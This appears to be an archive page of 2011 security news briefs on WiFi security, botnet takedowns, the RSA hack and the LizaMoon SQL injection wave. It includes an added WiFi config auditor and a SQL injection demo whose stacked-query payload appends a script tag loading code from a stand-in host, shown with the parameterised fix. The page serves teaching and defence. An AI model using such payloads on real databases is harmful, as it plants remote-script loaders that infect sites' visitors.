Security
FBI child porn raid a strong argument for locking down WiFi networks
- Monday, 25 April 2011 10:05
Will it take being accused of downloading child pornography to get people to lock down their WiFi networks once and for all? Although that's not the only reason to keep your network secure, perhaps some users will be scared into doing so after reading a number of horror stories collected by the Associated Press over the weekend. The underlying lesson: keep your WiFi networks locked down, lest you find law enforcement kicking down your door in the middle of the night.
The three stories all fall along the same theme: a Buffalo man, Sarasota man, and Syracuse man all found themselves being raided by the FBI or police after their wireless networks were allegedly used to download child pornography. "You're a creep... just admit it," one FBI agent was quoted saying to the accused party. In all three cases, the accused ended up getting off the hook after their files were examined and neighbors were found to be responsible for downloading child porn via unsecured WiFi networks.
Being accused of amassing the world's largest collection of child pornography is just one of the many downsides to leaving your network open, yet people (including some self-identified geeks) continue to do it. But why? As evidenced by reader e-mail over the last few years, some users claim they're providing a service to their neighbors by letting them use their WiFi every so often (in turn, these users tend to also make use of open WiFi networks when they see them). Others hope that leaving their WiFi networks open will help to exonerate them if they were to be accused of downloading copyrighted music or movies—Big Content would never sue the wrong individual for copyright infringement, right?
The AP's cautionary tales come just months after wireless industry group Wi-Fi Alliance published a survey saying that 32 percent of Internet users have tried to connect to a WiFi network that wasn't theirs. When managing their own networks though, 40 percent said that they would be more likely to trust someone with a key to their homes than the password to their WiFi access points. "Much like the seatbelts in your car, [WiFi security] won't protect you unless you use it," Wi-Fi Alliance marketing director Kelly Davis-Felner said at the time.
We have a guide to protecting yourself on public WiFi hotspots, but what about your own WiFi network? The Wi-Fi Alliance recommends WPA2 with a strong passphrase (at least eight characters, no dictionary words, with a mixture of upper and lower case letters, numbers, and symbols). You can also stop your router broadcasting its SSID and, if you want to go further, require each device's MAC address to be approved before it can connect. Bear in mind that those last two are speed bumps rather than locks: a hidden SSID still shows up in the traffic of clients that know it, and a MAC address can be read off the air and spoofed in seconds, so it is WPA2 with a strong passphrase that actually keeps strangers off your network. Doing all this may lose you friend points during your annual Super Bowl party, but it will go a long way towards avoiding unwanted accusations of downloading child pornography.
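The recommendations above, as an added example of the check a practitioner would run against an access-point configuration (this is illustrative code written for this page, not something from the article or the Wi-Fi Alliance). It assumes a hostapd-style key=value config; the two sample configs, the tiny dictionary word list and the passphrases are constructed for the example, and other access points expose the same choices under different labels.

```python
import re

# A tiny stand-in for a real wordlist; load a proper one in practice (constructed).
DICTIONARY_WORDS = {"password", "welcome", "internet", "wireless", "letmein", "admin"}

# Constructed hostapd-style configs: the settings a user is warned about in the
# article, and the same access point with the recommendations applied.
WEAK_CONF = """\
interface=wlan0
ssid=HomeNet
hw_mode=g
channel=6
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=welcome1
"""

HARDENED_CONF = """\
interface=wlan0
ssid=HomeNet
hw_mode=g
channel=6
ignore_broadcast_ssid=1
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
rsn_pairwise=CCMP
wpa_passphrase=Tr4ck#th3m-Down_2011
"""


def parse_conf(text):
    """key=value lines into a dict; blank lines and # comments are skipped."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def passphrase_findings(pw):
    """Apply the Wi-Fi Alliance passphrase rules quoted in the article."""
    findings = []
    if len(pw) < 8:
        findings.append("passphrase shorter than 8 characters")
    if not re.search(r"[a-z]", pw):
        findings.append("passphrase has no lower-case letter")
    if not re.search(r"[A-Z]", pw):
        findings.append("passphrase has no upper-case letter")
    if not re.search(r"[0-9]", pw):
        findings.append("passphrase has no digit")
    if not re.search(r"[^A-Za-z0-9]", pw):
        findings.append("passphrase has no symbol")
    if any(word in pw.lower() for word in DICTIONARY_WORDS):
        findings.append("passphrase contains a dictionary word")
    return findings


def audit(conf_text):
    """Return a list of findings; an empty list means the config passes."""
    s = parse_conf(conf_text)
    findings = []

    wpa = s.get("wpa", "0")  # hostapd: 0 open, 1 WPA, 2 WPA2/RSN, 3 both
    if wpa == "0":
        findings.append("open network: set wpa=2")
    elif wpa == "1":
        findings.append("WPA (v1) only: set wpa=2")
    elif wpa == "3":
        findings.append("WPA (v1) still allowed alongside WPA2: set wpa=2")

    # TKIP is the legacy WPA cipher; WPA2 should run CCMP (AES) only.
    ciphers = (s.get("wpa_pairwise", "") + " " + s.get("rsn_pairwise", "")).split()
    if wpa != "0" and ("TKIP" in ciphers or "CCMP" not in ciphers):
        findings.append("pairwise cipher should be CCMP only, not TKIP")

    if wpa != "0":
        findings.extend(passphrase_findings(s.get("wpa_passphrase", "")))

    # The two optional measures from the article, reported as notes because they
    # slow a stranger down (hidden SSID, MAC allow-list) but do not stop one.
    if s.get("ignore_broadcast_ssid", "0") == "0":
        findings.append("note: SSID is broadcast")
    if s.get("macaddr_acl", "0") != "1":
        findings.append("note: no MAC address allow-list")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf))
```

The weak config trips seven checks (WPA1, TKIP, three passphrase rules, and the two notes); the hardened one trips none. The passphrase rules are the Alliance's stated policy, not a measure of entropy, so a long random passphrase that happens to lack a symbol would still be flagged.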
HBGary's open letter: full of denials that don't hold water
- Tuesday, 19 April 2011 18:49
HBGary, the security firm that saw its servers hacked and its e-mails released after its HBGary Federal offshoot angered the Anonymous hive, published a rather peculiar open letter this past Friday in an effort to address the "large amount of misinformation reported in the press." But the letter makes some questionable claims of its own.
The unsigned letter outlines the basics of the attack and asserts that HBGary's internal systems remained safe and uncompromised. To ward off future attacks, the letter also claimed that HBGary's website, which was hacked using a basic security flaw, and its e-mail system, which fell victim to weak, re-used passwords, were now back in operation with "even stronger cyber defense mechanisms."
DoJ, FBI set up command-and-control servers, take down botnet
- Thursday, 14 April 2011 07:28
Past efforts at killing botnets—the large networks of computers running malicious software to send spam, flood websites with traffic, and steal personal data—have managed to disable the networks by taking down important servers, but they've always stopped short of actually killing the botnet software itself. That's because the companies behind these efforts have no more legal authority to run unauthorized software on users' machines than the botnet owners do—to remove the botnet software would make them just as guilty of hacking as the bad guys are.
The result is that while efforts such as Microsoft's disruption of the Waledac and Rustock botnets were successful, they were far from perfect. These efforts left the malicious software running on the infected PCs—they just removed the command and control servers, the centralized machines that tell the botnet what to do. Should the bot herders regain control of the domain names or IP addresses used by the command-and-control servers, the infected machines will be able to successfully connect to them, and the networks will once again spring into life.
Not anonymous: attack reveals BitTorrent users on Tor network
- Tuesday, 12 April 2011 09:57
Think that anonymizing BitTorrent tracker connections through Tor makes you harder to track? Think again. A vulnerability was used to identify over 10,000 users' IP addresses via their BitTorrent tracker connections. But it's not just your BitTorrent downloads that are at risk: an attacker can use your BitTorrent connections to de-anonymize other, more secure applications run over Tor.
In a paper released a few weeks ago at the USENIX conference's workshop on Large-scale Exploits and Emergent Threats (LEET), researchers from INRIA France revealed a class of vulnerabilities in the Tor system which threatens the anonymity of many BitTorrent users. The research team, led by Stevens Le Blond, explained an attack methodology which it developed and deployed. The attack exploits a feature of Tor originally introduced to improve anonymity and efficiency, but it also relies on certain aspects of the BitTorrent protocol.
Looking for malware? Search for porn
- Tuesday, 05 April 2011 19:54
Symantec detected more than three billion malware attacks from 286 million malware variants last year, according to the 2010 edition of its annual Internet Security Threat Report, published today. Web-based attacks were up 93 percent on 2009, and you were most likely to come across a malicious Web site if you were on the hunt for pornography; 49 percent of malicious sites found through Web searches were pornographic.
Overall, the report paints a grim picture of the Internet threat landscape. Software flaws are abundant. In 2010, 6,253 software vulnerabilities were reported, higher than in any previous edition of the report. 14 vulnerabilities were used in zero-day attacks, including four different Windows zero-days used in the Stuxnet attack.
Though data breaches are still relatively rare—457 in 2010 according to aggregator DataLossDB—they still put many at risk. About 61,000 identities were compromised on average, with breaches in the finance sector particularly big, at an average of over 235,000 identities per breach. Breaches as a result of hacks—rather than insiders, or theft or loss of hardware and media—tended to be substantial, averaging more than 262,000 identities per hack.
The bad guys also demonstrated a firm grasp of new technology. Social networking sites are a huge target, both due to their wide use and their enormous susceptibility to social engineering. In mass, untargeted attacks, the social networking sites give malicious links a veneer of integrity—if a friend of yours posts a link it's surely going to be safe, right? For spear-phishing and other targeted attacks, the social networks give valuable insight into individual habits and interests, not to mention the ability for hackers to strike up friendships with their would-be victims and to gain their trust that way.
Hand in hand with social networking sites like Twitter, we've also seen a boom in URL shortening services such as bit.ly. Hackers have been quick to exploit the way these mask the destination URL, making it much harder to know whether a link is malicious until you actually click on it. Two-thirds of the malicious links seen on social networking sites used such masked, shortened URLs.
Smartphones are also beginning to attract malware. 2010 saw the discovery of the first Android trojan, and it looks like hackers regard Android as a ripe platform for attacks—last month more than 50 malicious programs were yanked from Android Market. More vulnerabilities are being found on mobile platforms, with 163 found last year, an increase of 41 percent. While still small-scale attacks compared to their PC-based counterparts, this is set to be a growth market. Smartphones are chock full of personal information and thanks to premium rate phone and text numbers, have an unparalleled ability to monetize malware.
Patching won't save you
2010 was also a big year for targeted attacks; Google came out as a victim of the Aurora attacks, and, of course, Stuxnet struck Iran. The targeted attacks were notable for their use of zero-day vulnerabilities—three different Internet Explorer zero-days were used in three separate targeted attacks, and Stuxnet used four Windows zero-days. Social engineering was also instrumental in these attacks.
The use of zero-days is significant because it means that even an organization with good practices (patching machines on a timely basis, using anti-malware software) is at risk; these old mechanisms do little to guard against this style of attack. Heuristic analysis and sandboxing techniques both have a role to play in detecting these problems but work still needs to be done to make these easy to use, robust, and effective.
More than anything else, the report shows that the security situation really isn't improving; it's getting quite a bit worse. Social networking-based social engineering and zero-day targeted attacks put even conscientious, well-educated users at risk. Software vulnerabilities are abundant, and malware is rampant. That's good news for companies like Symantec—it ensures that they'll continue to see a large market for their security products. But it's bad news for everyone else.
Spearphishing + zero-day: RSA hack not "extremely sophisticated"
- Monday, 04 April 2011 14:17
Security firm RSA announced in March that it had been the victim of a hack that it described as "extremely sophisticated." The company has now shared some details of the attack. "Extremely sophisticated"? More like "run-of-the-mill."
A spear-phishing e-mail was sent to two small groups within the company. Though the e-mail was automatically marked as Junk, the subject of the message ("2011 Recruitment Plan") tricked one employee into retrieving and opening it anyway. Attached to the mail was an Excel spreadsheet, "2011 Recruitment plan.xls". Embedded within the spreadsheet was a Flash movie that exploited a Flash vulnerability for which no patch existed at the time. Adobe has since released an emergency patch for the flaw.
Massive SQL injection attack making the rounds—694K URLs so far
- Thursday, 31 March 2011 17:54
Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.
The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language. The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and splicing that input directly into the text of a database query. If the input is crafted in a particular way, the database will run SQL of the attacker's choosing.
In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically "http://lizamoon.com/ur.php" or more recently, "http://alisa-carter.com/ur.php." Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.
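The two preceding paragraphs, as an added example (illustrative code written for this page, not code from the article or from any of the attacked sites): a lookup that splices a URL parameter into its query, the kind of payload that turns it into a mass update of text columns, and the parameterised version that treats the same payload as data. The table, its rows and the script-tag domain are constructed stand-ins; sqlite3's executescript stands in for database drivers that execute stacked statements, which is an assumption about the back ends involved rather than something the article states.

```python
import sqlite3

# Constructed stand-in for the script tag appended to text columns; the
# domain is a placeholder, not the one named in the article.
SCRIPT_TAG = '<script src="http://evil.example/ur.php"></script>'

# A URL parameter such as ?id=1, rewritten by an attacker. The quote closes the
# string literal, the semicolon starts a second statement, and "--" comments
# out whatever the application appends after the value.
PAYLOAD = "1'; UPDATE posts SET body = body || '" + SCRIPT_TAG + "'; --"


def fresh_db():
    """Tiny CMS table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO posts (title, body) VALUES (?, ?)",
        [("Hello", "<p>first post</p>"), ("Podcast", "<p>episode 12</p>")],
    )
    db.commit()
    return db


def vulnerable_lookup(db, post_id):
    """Builds the query by concatenation, so the parameter is parsed as SQL.

    executescript stands in for drivers that run several statements in one
    call (assumed here). It discards result rows, which does not matter: the
    damage is done by the statement that follows the SELECT.
    """
    sql = "SELECT title, body FROM posts WHERE id = '" + post_id + "'"
    db.executescript(sql)
    db.commit()


def safe_lookup(db, post_id):
    """Parameterised query: the value travels separately from the SQL text,
    so quotes and semicolons inside it are data, never syntax."""
    cur = db.execute("SELECT title, body FROM posts WHERE id = ?", (post_id,))
    return cur.fetchall()


def infected_rows(db):
    """Number of rows whose body now carries a script tag."""
    return db.execute(
        "SELECT COUNT(*) FROM posts WHERE body LIKE '%<script%'"
    ).fetchone()[0]


def demo():
    """Returns (rows tainted via the vulnerable path, rows the safe path
    returns for the same payload, rows tainted via the safe path)."""
    db = fresh_db()
    vulnerable_lookup(db, PAYLOAD)
    tainted = infected_rows(db)        # every row now carries the script tag

    db2 = fresh_db()
    returned = safe_lookup(db2, PAYLOAD)  # no post has that literal id
    clean = infected_rows(db2)
    return tainted, len(returned), clean


if __name__ == "__main__":
    print(demo())  # (2, 0, 0)
```

The fix is not escaping the quote (the next encoding trick gets past that) but the bound parameter: the driver sends the query text and the value as separate things, so the database never has to guess where one ends and the other begins. The same one-line change applies whichever of the languages listed above the application is written in.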
The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing.
The injected code is also found on a number of product pages on Apple's iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple's system. However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified.
SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands. In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia.
It's been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.
Rustock repercussions: Spam down by a third, at least for now
- Tuesday, 29 March 2011 17:38
It's sure to be temporary, but we should enjoy it while we can: Microsoft's action to behead the Rustock botnet has seen global spam levels drop by about a third, according to Symantec-owned messaging and security provider MessageLabs.
The full report shows that there's still a lot of work to be done. In 2010, 88 percent of all spam emails were sent by botnets, and of that botnet-originated spam, Rustock was responsible for an average of 28 percent. Taking out Rustock has unsurprisingly had a substantial impact on spam levels. However, MessageLabs reports that other botnets have increased spam production over the same period, making it likely that previous spam volumes will be resumed soon enough.
The data does give some reason for optimism, however. Just ten botnets (including Rustock) are responsible for about 74 percent of all spam. Taking out these botnets would not be a minor undertaking, but it's still a manageable scale—the botnet market is relatively consolidated. While eradicating the botnets certainly won't eradicate spam, it may well reduce it to tolerable levels. Gradual improvements in system security—not least the slow abandonment of Windows XP—and replacement of infected systems should make it harder to recruit large-scale botnets in the future, amplifying the effect of each botnet takedown.
That future is, alas, still some way off; in the meantime, aggressive spam filtering at the server and client level is the only viable recourse. A case might also be made for better legislation—one of the more surprising aspects of Microsoft's Rustock lawsuit was the circuitous route by which the company had the server hardware used by the botnet seized. The company had to use trademark law—claiming that Rustock's spam infringed on both its own and Pfizer's trademarks—in order to have the server hardware seized. Existing anti-spam legislation only allows domain names to be taken—an insufficient tool for taking down Rustock.